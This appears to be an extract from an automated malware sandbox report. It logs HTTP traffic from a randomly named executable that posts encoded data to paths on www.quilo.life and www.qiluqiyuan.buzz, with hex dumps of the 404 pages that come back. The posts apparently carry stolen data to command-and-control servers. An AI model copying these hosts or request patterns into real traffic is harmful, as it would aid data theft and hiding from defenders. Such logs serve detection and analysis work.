                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.2249179203.161.43.228801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:30.124953985 CEST2472OUTPOST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 59 49 73 58 35 41 47 68 45 63 35 74 79 78 75 68 57 4d 52 74 50 4a 59 44 6f 62 4e 35 6a 6d 30 6c 33 2f 66 35 79 4d 41 49 32 51 66 45 53 53 73 63 45 53 58 69 6e 51 58 6f 62 34 76 65 4d 71 6c 4c 33 31 56 2b 63 61 71 33 4f 42 5a 41 61 4b 59 31 4d 6f 55 31 75 43 6d 47 73 67 51 61 4d 43 76 72 79 4e 54 6a 59 6a 7a 62 4a 76 33 71 57 31 55 6b 30 75 44 4c 6c 4d 41 41 45 37 4f 6d 61 74 6a 79 48 57 68 52 72 49 50 45 4b 35 34 5a 54 66 48 31 4d 32 64 33 50 43 64 4d 31 4d 6a 59 34 68 61 36 4c 69 45 6b 55 6a 49 69 68 73 77 6c 2b 39 58 4e 72 53 43 61 6d 44 76 46 56 49 5a 52 75 69 67 53 57 42 42 31 41 39 63 64 55 37 4d 75 35 72 57 75 4e 47 37 70 5a 71 2f 71 51 6d 63 5a 49 6f 7a 75 67 46 6f 37 44 35 6f 78 50 4f 5a 63 46 42 66 66 39 55 59 7a 6c 36 42 6b 51 6b 2f 54 79 71 48 4d 43 59 51 4c 33 30 5a 72 70 59 75 46 4b 64 30 74 38 6b 6b 54 39 33 54 39 65 71 4a 56 37 35 69 78 32 5a 49 31 71 76 35 4e 45 45 48 6a 6e 62 6c 70 39 65 6d 46 4d 35 55 5a 52 70 33 57 74 35 6a [TRUNCATED]
                                        Data Ascii: OlTXe=2iJzcjLeEdvuVYIsX5AGhEc5tyxuhWMRtPJYDobN5jm0l3/f5yMAI2QfESSscESXinQXob4veMqlL31V+caq3OBZAaKY1MoU1uCmGsgQaMCvryNTjYjzbJv3qW1Uk0uDLlMAAE7OmatjyHWhRrIPEK54ZTfH1M2d3PCdM1MjY4ha6LiEkUjIihswl+9XNrSCamDvFVIZRuigSWBB1A9cdU7Mu5rWuNG7pZq/qQmcZIozugFo7D5oxPOZcFBff9UYzl6BkQk/TyqHMCYQL30ZrpYuFKd0t8kkT93T9eqJV75ix2ZI1qv5NEEHjnblp9emFM5UZRp3Wt5jhzxQkoEuUr969YfAeeAY5zMHIll2Vdgf+myYQbiunk4jciRNzxp3//h0SVev9lySFJ/H2XOb3oR01Wwzbwk1akIP8wwuRDBPDZEn69mC2FFgg9xInwyoOFVOZA1TT+vOGdrngH4bL1OUnaGtHbzm/vALrLDliXuUruoezRnWKbz3H83StUzUxUvqT1e0lSS9jFUG8PejxGYDofuWjTF2Qsy5sMUYmkyM8csic6s5oQ0GGkwJktQeD+Hx+Y5v44VeHId0UEPXywz7B8qTd7iqrp4xme0nTuBEdJ3uEqhNM12KgsYJe0EgQXFzA9s6vq0M0CLslpUkMDU5aVVeuVJlPON1b9f6I/xkC9VGpHIzBB9zvM1D4bdHQ6/5ue/qgY3eyMA+Wl9BSuKuLo+OZevREXMd0evt4XMhzLeLBgd3JRyYEu+aVN4hGkZANEEhDYMsb+jFbYM+vkb4X9cMtlgNPbn7W4sTd/m1WFncWwH6PGUGyiV04Cyjqt00l0xXoZFRnmKy6CmoTcgvYaf42ynTNVYXcCWSexnUNrahJyUbePg3bridTzDj1oAzLVslsFPZlzlYeLApofJDw3Ni3wEH4dvpGFZ4IumSr/lP/3WJdV/D6uzZJiXyEIruKmXYuONHLXkUt7ASmDRkLtU2WEHIKQP7LKbIUZwor4 [TRUNCATED]
                                        Sep 11, 2024 10:10:30.131306887 CEST206OUTData Raw: 64 35 69 69 5a 4b 2f 70 36 61 6c 62 54 52 43 34 46 41 49 78 58 54 73 56 5a 43 55 4a 54 33 51 35 73 44 48 32 7a 62 4b 56 57 33 54 31 6e 72 62 41 36 42 30 32 46 4e 4b 43 50 58 78 49 6b 6f 56 4d 67 57 6e 51 42 32 75 6e 78 47 58 59 53 6f 62 74 75 4b
                                        Data Ascii: d5iiZK/p6albTRC4FAIxXTsVZCUJT3Q5sDH2zbKVW3T1nrbA6B02FNKCPXxIkoVMgWnQB2unxGXYSobtuKosz1pZY3BNzmJYxoYP7KT4OpCRtiuI+y7/Q5H1/HMMfTNvaWJnBQen+1ZxvcboqGxEDftnkrx1YxcrRNxh9UZK71/msOymxwRSoymXisSNpFbMCitA4MSaVcAC1m
                                        Sep 11, 2024 10:10:30.726289034 CEST658INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:30 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.2249180203.161.43.228801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:32.680532932 CEST717OUTPOST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 53 58 59 6e 46 72 63 38 77 62 47 79 70 58 66 58 6c 68 34 36 6c 61 4d 49 59 4a 2f 47 4a 51 3d 3d
                                        Data Ascii: OlTXe=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMSXYnFrc8wbGypXfXlh46laMIYJ/GJQ==
                                        Sep 11, 2024 10:10:33.427598000 CEST658INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:33 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.2249181203.161.43.228801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:35.231431007 CEST2472OUTPOST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 39 61 37 59 36 45 6b 58 4c 48 70 52 73 7a 70 75 39 58 53 37 53 4d 61 6d 44 6a 46 56 49 5a 52 75 65 67 55 57 42 42 31 46 42 66 41 45 37 4d 6b 5a 72 50 77 39 44 4d 70 5a 2f 63 71 51 57 4d 5a 2f 59 7a 70 69 64 6f 73 54 35 6f 6d 76 50 53 63 46 42 43 52 64 55 69 7a 6c 7a 69 6b 51 30 76 54 79 71 48 4d 42 41 51 4f 69 67 5a 69 5a 59 75 4d 71 64 35 6d 63 6b 37 54 39 7a 4c 39 65 32 4a 56 35 5a 69 77 42 6c 49 69 5a 4c 2b 43 55 45 47 6e 6e 62 6a 37 4e 66 37 46 4d 6b 50 5a 52 67 51 57 73 70 6a [TRUNCATED]
                                        Data Ascii: OlTXe=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5iq0l13f+iMAJ2QcbiSscESYinFQob1YePClL21V+fCq0OBZN6Ke1Mkm1on/Gvl9aOOvrAFTjN/8RZvt9G11k0S2LlFdAEfkmc5jy3WhZ7IMIq4wLjfB1M6J3PCZM1IJY49a7Y6EkXLHpRszpu9XS7SMamDjFVIZRuegUWBB1FBfAE7MkZrPw9DMpZ/cqQWMZ/YzpidosT5omvPScFBCRdUizlzikQ0vTyqHMBAQOigZiZYuMqd5mck7T9zL9e2JV5ZiwBlIiZL+CUEGnnbj7Nf7FMkPZRgQWspjh2lQlJEuIL9704eLaeEc5zE5IkQNVdAf83yYXZKv5k4lZiRH5RpV//1KSU+v+UKSEIfHzgSa1YR3xWxrVgkhakNa8wM+QxJPZJEn5Y6B61Eo4txk8gy6OFV0ZB5DSOnOGdbng0QbL1OXt6HmN73h/vMPrLf1iVGUq+0ezVLWM7z3dM3Vn0zexU76T1GelGC9jncGvdGj5GY77vvRszFBQsC5sIMImnyM94Yicbs5wg0KPEwSktQoD+D9+cV/479eHJd0BQbX8Qz6HMqXZ7iBrpghmdgZTshEctLuG7hNNV2I4cYJJkFgQU1JA8wqvvIMzwzsyZUjBjU6YVVfqVI6POd1b9D6I+JkBMVG+EgzeB9xis0chqgiQ6PPuautgenezdA+VjJOOuKoBI+ETOuOEXMB0f394lEhzb+LDCl0FRyfOO+zbt4BGkJqNFBkCv8sb+TFbrk+vUb4X9cDtlhEPbrFW601d/m1WRzcWFz6EmUftSVV8Cy9qtxnl0YKoZhRm3Gy6CmrOcggQ6f72ybkNVY5cCSSejrUP8ahJR8bJfg3YrieZTDY1oAjLUgPsHnZmnZYSt8qqvJXgHM68QJX4dTxGAh4LfWSoNNP4HWJe1/CxOyDUSbUEJGzKnHIv/dHRB4UhaARtTRwPtUwWEK4KQXJLK/2UaAorY [TRUNCATED]
                                        Sep 11, 2024 10:10:35.236588955 CEST1670OUTData Raw: 64 6c 69 69 59 35 2f 6f 6d 67 6c 59 66 52 43 4b 39 41 66 51 58 54 73 6c 59 4a 65 70 54 43 61 5a 67 52 48 32 33 48 4b 58 50 43 54 42 6e 72 61 30 53 42 68 54 52 4e 50 69 50 53 77 49 6b 66 56 4a 34 2b 6e 55 63 58 75 6c 4a 38 58 70 65 6f 61 64 75 4b
                                        Data Ascii: dliiY5/omglYfRCK9AfQXTslYJepTCaZgRH23HKXPCTBnra0SBhTRNPiPSwIkfVJ4+nUcXulJ8XpeoaduKsvajtZZ8RdzhJYwPYPzGT6a5CQ1iuKWy6PQ4Nl/JJMfFNvHyJnZueja1ZxzcbMKG4kDflHkzvlYSD7VOxhUXDrHUoWAarCVLIDUmuVive5pmUYG+4xh0Q8pYNnslDd1A20Ubb16BmP/pPZaZoH8XORN11a0WjuJ2l
                                        Sep 11, 2024 10:10:35.875650883 CEST658INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:35 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.2249182203.161.43.228801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:37.855438948 CEST454OUTGET /ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:38.516591072 CEST673INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:38 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.2249183161.97.168.245801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:43.572134972 CEST2472OUTPOST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4e 43 66 79 49 38 61 44 38 48 4b 2b 4e 4e 2b 53 72 65 77 6b 6f 79 45 34 4c 6f 4e 63 79 52 4e 47 6c 6d 30 44 72 66 74 30 78 47 2f 74 76 4e 75 4f 7a 62 55 41 78 70 69 6c 77 62 4d 67 46 6d 59 44 31 6a 39 2b 4e 78 41 44 65 59 43 47 71 74 2b 47 2b 4e 68 30 33 2b 6b 78 52 75 66 50 42 4a 31 69 76 6a 70 6e 4f 57 35 66 64 31 35 79 49 42 47 45 34 2b 6e 6a 38 44 67 6e 73 66 6f 41 6d 7a 6a 42 44 62 79 36 57 33 47 4a 76 77 72 42 4a 38 43 58 39 56 50 66 6e 46 55 43 78 48 6a 76 56 2b 69 6e 67 74 52 6b 6c 2f 61 62 6a 41 5a 78 41 4e 6e 51 5a 74 6e 38 72 37 44 2f 61 41 6e 4f 6a 37 30 4c 4c 65 32 6e 42 69 79 4d 4f 35 30 72 76 70 45 37 4f 64 77 39 65 41 54 46 34 73 62 58 6e 6f 38 6b 34 70 6a 61 68 63 63 2f 74 42 75 62 42 6e 48 31 65 6c 5a 5a 6d 5a 44 61 35 69 65 4f 41 4d 74 76 70 37 35 31 73 48 65 31 68 74 79 6d 47 62 76 4c 32 51 6d 42 62 56 77 41 42 6c 42 45 59 65 33 62 55 2f 39 31 75 73 43 37 45 59 6e 6f 4c 33 52 34 64 66 6b 78 59 2f 4b 62 50 43 72 76 43 48 59 [TRUNCATED]
                                        Data Ascii: 